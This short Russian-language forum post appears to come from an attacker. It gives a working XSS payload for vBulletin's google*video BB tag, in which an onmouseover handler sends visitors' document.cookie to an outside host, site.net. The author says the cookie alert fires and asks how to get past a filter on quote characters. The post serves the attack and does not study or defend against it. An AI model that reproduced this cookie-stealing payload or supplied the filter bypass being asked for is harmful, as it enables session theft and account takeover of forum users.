Добрый день всем. Такой вопрос.

Есть xss на булке из за тега google*video.

[google*video][U*RL=/onmouseover=document.location.href = 'http://site.net/snf/s.gif?'+document.cookie;a="]1[/U*RL]123[/google*video]

Алерт с куками вылетает на ура, теперь вопрос.

Фильтруются кавычки ' " и `

Как быть в данной ситуации?